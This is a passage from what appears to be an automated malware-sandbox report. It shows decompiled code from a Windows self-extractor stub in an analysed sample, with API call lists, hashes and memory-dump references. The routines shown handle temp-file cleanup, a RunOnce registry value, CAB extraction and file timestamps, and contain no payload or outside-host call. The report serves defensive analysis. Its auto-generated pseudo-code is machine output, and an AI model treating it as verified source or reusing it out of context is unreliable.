							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0xac8a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0xac8a24 == 0 &&  *0xac9a30 == 0) {
					_push(_t22);
					E00AC1781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
					if(( *0xac9a34 & 0x00000020) != 0) {
						E00AC65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00AC2390( &_v268);
					_t11 =  *0xac8a20; // 0x0
				}
				if( *0xac9a40 != 1 && _t11 != 0) {
					_t11 = E00AC1FE1(_t22); // executed
				}
				 *0xac8a20 =  *0xac8a20 & 0x00000000;
				return E00AC6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x00ac52b6
0x00ac52b6
0x00ac52b6
0x00ac52c1
0x00ac52c8
0x00ac52cb
0x00ac52cc
0x00ac52d4
0x00ac52d6
0x00ac52d7
0x00ac52de
0x00ac52e0
0x00ac52f2
0x00ac52fa
0x00ac52fa
0x00ac5302
0x00ac5305
0x00ac530c
0x00ac5312
0x00ac5316
0x00ac5316
0x00ac5317
0x00ac531c
0x00ac531f
0x00ac5333
0x00ac5345
0x00ac5351
0x00ac5359
0x00ac5359
0x00ac5363
0x00ac5369
0x00ac536f
0x00ac5374
0x00ac5374
0x00ac5381
0x00ac5387
0x00ac5387
0x00ac538f
0x00ac53a0

APIs

SetFileAttributesA.KERNELBASE(02EB7B60,00000080,?,00000000), ref: 00AC52F2
DeleteFileA.KERNELBASE(02EB7B60), ref: 00AC52FA
LocalFree.KERNEL32(02EB7B60,?,00000000), ref: 00AC5305
LocalFree.KERNEL32(02EB7B60), ref: 00AC530C
SetCurrentDirectoryA.KERNELBASE(00AC11FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC5363

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC5334

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 2833751637-183442868
Opcode ID: 307470e3ee00aae4041a33dbf3cf524113d25632452c704651ebeffebcb0e5c4
Instruction ID: f8586b51083eddbe22e57fbe793ba10f100e0147f2a8eff02ce3c605939c3960
Opcode Fuzzy Hash: 307470e3ee00aae4041a33dbf3cf524113d25632452c704651ebeffebcb0e5c4
Instruction Fuzzy Hash: 1C218E31900648DFDB20DBA4DD19F6A77A4BB107D4F07015DF4465A2A0CFB8AC86CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00AC1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC1FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0xac8530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00ac1fee
0x00ac2005
0x00ac200d
0x00ac2017
0x00000000
0x00ac2020
0x00ac200d
0x00ac2029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00AC538C,?,?,00AC538C), ref: 00AC2005
RegDeleteValueA.KERNELBASE(00AC538C,wextract_cleanup2,?,?,00AC538C), ref: 00AC2017
RegCloseKey.ADVAPI32(00AC538C,?,?,00AC538C), ref: 00AC2020

Strings

wextract_cleanup2, xrefs: 00AC1FE7, 00AC200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00AC1FFB

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
API String ID: 849931509-3354236729
Opcode ID: 72881697644a1ee5cbbc109cad988d47e78859681c453252b71a6ade8794dab2
Instruction ID: aa4ac9cb7150ec47cc7752c60fe2fec61e9068101b0387caab0cd287b2cdb017
Opcode Fuzzy Hash: 72881697644a1ee5cbbc109cad988d47e78859681c453252b71a6ade8794dab2
Instruction Fuzzy Hash: 2FE04630A5031CBBEB21CBE4EC0AF697B29FB10B85F120199BA05A00A1EBA55E15D706

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00AC4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0xac8004; // 0xc32e3ded
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0xac91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00AC4E99(_t75);
						L35:
						return E00AC6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0xac8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0xac91e4;
						_t58 = 0xac91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0xac91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0xac91e4;
						_t30 = E00AC4702( &_v268, 0xac91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E00AC476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00AC4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E00AC47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0xac93f4 =  *0xac93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0xac91e4;
						_t63 = 0xac91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0xac91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0xac91e4;
						_t30 = E00AC4702( &_v268, 0xac91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00AC4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00AC4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00AC4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00ac4cd0
0x00ac4cdb
0x00ac4ce0
0x00ac4ce2
0x00ac4cee
0x00ac4cf2
0x00ac4d0e
0x00ac4d0e
0x00ac4d11
0x00ac4e83
0x00ac4e88
0x00ac4e98
0x00ac4e98
0x00ac4d17
0x00ac4d17
0x00ac4d1a
0x00ac4d2f
0x00ac4d2f
0x00000000
0x00ac4d2f
0x00ac4d1c
0x00ac4d1c
0x00ac4d1f
0x00ac4dcb
0x00ac4dd0
0x00ac4dd2
0x00ac4ddd
0x00ac4ddd
0x00ac4de3
0x00ac4de8
0x00ac4ded
0x00ac4ded
0x00ac4def
0x00ac4df0
0x00ac4df0
0x00ac4df4
0x00ac4df4
0x00ac4df6
0x00ac4df9
0x00ac4dfc
0x00ac4dfc
0x00ac4dfe
0x00ac4dff
0x00ac4dff
0x00ac4e03
0x00ac4e08
0x00ac4e0a
0x00ac4e0f
0x00ac4d03
0x00ac4d03
0x00000000
0x00ac4d03
0x00ac4e18
0x00ac4e20
0x00ac4e25
0x00ac4e27
0x00000000
0x00000000
0x00ac4e33
0x00ac4e38
0x00ac4e3a
0x00000000
0x00000000
0x00ac4e40
0x00ac4e51
0x00ac4e56
0x00ac4e5b
0x00ac4e5e
0x00000000
0x00000000
0x00ac4e6a
0x00ac4e6f
0x00ac4e71
0x00000000
0x00000000
0x00ac4e77
0x00ac4e7d
0x00000000
0x00ac4e7d
0x00ac4d25
0x00ac4d25
0x00ac4d28
0x00ac4d36
0x00ac4d3b
0x00ac4d40
0x00ac4d40
0x00ac4d42
0x00ac4d43
0x00ac4d43
0x00ac4d47
0x00ac4d4a
0x00ac4d4a
0x00ac4d4c
0x00ac4d4f
0x00ac4d4f
0x00ac4d51
0x00ac4d52
0x00ac4d52
0x00ac4d56
0x00ac4d5b
0x00ac4d5d
0x00ac4d62
0x00000000
0x00000000
0x00ac4d67
0x00ac4d6f
0x00ac4d74
0x00ac4d76
0x00000000
0x00000000
0x00ac4d7c
0x00ac4d84
0x00ac4d89
0x00ac4d8b
0x00000000
0x00000000
0x00ac4d94
0x00ac4d99
0x00ac4d9e
0x00ac4da1
0x00ac4daa
0x00ac4daa
0x00ac4da3
0x00ac4da3
0x00ac4da3
0x00ac4db5
0x00ac4dbb
0x00ac4dbd
0x00000000
0x00ac4dc3
0x00ac4dc5
0x00000000
0x00ac4dc5
0x00ac4dbd
0x00ac4d2a
0x00ac4d2a
0x00ac4d2d
0x00000000
0x00000000
0x00000000
0x00ac4d2d
0x00ac4cf8
0x00ac4cfd
0x00ac4d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00AC4DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00AC4DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC4D36, 00AC4DE3

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 3625706803-183442868
Opcode ID: 8c29c6f5dd8158048974c55db1947a83448091239f776a9bb3deb0fe431dd8a2
Instruction ID: 9001f53cd83e2960d5e304939041894cdc2c078de90c24f63f59b07cb840577f
Opcode Fuzzy Hash: 8c29c6f5dd8158048974c55db1947a83448091239f776a9bb3deb0fe431dd8a2
Instruction Fuzzy Hash: 014103362042058ACB26AF28DA68FF677B5AB4D300F06466CE89397285DA31DE46C758

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC4C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0xac8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0xac8d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00ac4c40
0x00ac4c4a
0x00ac4c8d
0x00000000
0x00ac4c70
0x00ac4c70
0x00ac4c7e
0x00ac4c86
0x00000000
0x00000000
0x00000000
0x00ac4c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00AC4C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AC4C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00AC4C7E

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: db82e68f36c284b867724da40adad9d0d8ae224852be3e2c6484ff13fc1e5bf2
Instruction ID: 6aff969f0ca4be2f762a6c7b312ae33679eda4700b29ac4430489d72c10b0e25
Opcode Fuzzy Hash: db82e68f36c284b867724da40adad9d0d8ae224852be3e2c6484ff13fc1e5bf2
Instruction Fuzzy Hash: 29F0B47260520CAF9F65DFB5CC58EBB77FCEB18345B4A052FA816C1060EA30D914C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00AC487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00AC487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E00AC490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00ac4880
0x00ac488c
0x00ac4894
0x00ac48a0
0x00ac48c9
0x00ac48ce
0x00ac48a2
0x00ac48a8
0x00ac48b7
0x00ac48bc
0x00ac48aa
0x00ac48ac
0x00ac48ac
0x00ac48a8
0x00ac48de
0x00ac48e7
0x00ac490b
0x00ac48ee
0x00ac48f0
0x00000000
0x00ac4902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00AC4A23,?,00AC4F67,*MEMCAB,00008000,00000180), ref: 00AC48DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00AC4F67,*MEMCAB,00008000,00000180), ref: 00AC4902

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 656d0de8a9b4bd5db34caf17d72d8bf01b4ec13dc4d18917bd80a9863a55aa53
Instruction ID: a21e6f710f41605b7b20a176be88113beea78421982446ba62adf1423097b594
Opcode Fuzzy Hash: 656d0de8a9b4bd5db34caf17d72d8bf01b4ec13dc4d18917bd80a9863a55aa53
Instruction Fuzzy Hash: A0016DA3E1157426F32481694C98FB7555CCBDE734F1B0338BDEAEB1D1D5644C0482E4

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00AC4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0xac858c; // 0x268
				_t9 = E00AC3680(_t20);
				if( *0xac91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0xac8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0xac9400; // 0xba600
							_t15 = _t14 + _t25;
							 *0xac9400 = _t15;
							if( *0xac8184 != 0) {
								_t21 =  *0xac8584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xac93f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00ac4ad5
0x00ac4adb
0x00ac4ae7
0x00ac4aee
0x00ac4b05
0x00ac4b0d
0x00ac4b14
0x00ac4b1a
0x00ac4b1c
0x00ac4b21
0x00ac4b2a
0x00ac4b2f
0x00ac4b31
0x00ac4b39
0x00ac4b54
0x00ac4b54
0x00ac4b39
0x00ac4b2f
0x00ac4b0f
0x00ac4b0f
0x00ac4b0f
0x00ac4b5e
0x00ac4ae9
0x00ac4aed
0x00ac4aed

APIs

Part of subcall function 00AC3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00AC369F
Part of subcall function 00AC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00AC36B2
Part of subcall function 00AC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00AC36DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00AC4B05

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: de3fde7f1140a792da1013587ca330e709090a69df36d7ab70c0eeb04d21275f
Instruction ID: 88bca7b1701e763a89e8129d5a8aca21e5bdc7f8232866f3cd5226727b4563f9
Opcode Fuzzy Hash: de3fde7f1140a792da1013587ca330e709090a69df36d7ab70c0eeb04d21275f
Instruction Fuzzy Hash: F5016D31240205ABDB14CF98DC19FA27799B748726F0A8229E9399A1E0CB70DC12CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00AC658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0xac8b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0xac8b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E00AC16B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00ac6592
0x00ac6594
0x00ac6596
0x00ac6598
0x00ac6598
0x00ac659b
0x00ac659b
0x00ac659d
0x00ac659e
0x00ac65a2
0x00ac65a4
0x00ac65a9
0x00ac65b2
0x00ac65b6
0x00ac65ba
0x00ac65c3
0x00ac65c5
0x00ac65c8
0x00ac65c8
0x00ac65c3
0x00ac65c9
0x00ac65cc
0x00ac65d2
0x00ac65d1
0x00ac65d1
0x00000000
0x00ac65dc
0x00000000

APIs

CharPrevA.USER32(00AC8B3E,00AC8B3F,00000001,00AC8B3E,-00000003,?,00AC60EC,00AC1140,?), ref: 00AC65BA

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: b4d54a0eff5af7daa943dc94623932cd4e5cf542f165b8858e685caa9a11780d
Instruction ID: 5e425b01b5cc9ef4db3d2b980295d69f2525f3b385cda31624d4dfc59d1bc5f5
Opcode Fuzzy Hash: b4d54a0eff5af7daa943dc94623932cd4e5cf542f165b8858e685caa9a11780d
Instruction Fuzzy Hash: 55F042725042545BD3318A1D9884F76BFDD9BC6350F3A015EE8DAC7205CA654C4683A0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00AC621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0xac8004; // 0xc32e3ded
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E00AC597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E00AC44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0xac9124 = E00AC6285();
					_t9 = 0;
				}
				return E00AC6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00ac6229
0x00ac6230
0x00ac6247
0x00ac626a
0x00ac6272
0x00ac6249
0x00ac6255
0x00ac625f
0x00ac6264
0x00ac6264
0x00ac6284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00AC623F

Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554

Part of subcall function 00AC6285: GetLastError.KERNEL32(00AC5BBC), ref: 00AC6285

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 4afe8a9e49b84326b83116acd54268dd5db7bdc20449f02658f085cfe920737a
Instruction ID: 20e66b8aa83a1c0080070f2a2d671832705f9aa59dfa2db82335c0da256ec641
Opcode Fuzzy Hash: 4afe8a9e49b84326b83116acd54268dd5db7bdc20449f02658f085cfe920737a
Instruction Fuzzy Hash: D9F0E2B0B04208ABE750EBB48E06FFF33FCDB58300F42006EB986D6091EE749D858650

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0xac8d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0xac8d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0xac8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0xac8d60)) = 1;
				 *((intOrPtr*)(_t15 + 0xac8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0xac8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0xac8d6c)) = 0;
				return 0;
			}

0x00ac4b66
0x00ac4b74
0x00ac4b98
0x00ac4ba0
0x00000000
0x00ac4bac
0x00ac4ba4
0x00000000
0x00ac4ba4
0x00ac4b78
0x00ac4b7e
0x00ac4b84
0x00ac4b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00AC4FA1,00000000), ref: 00AC4B98

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
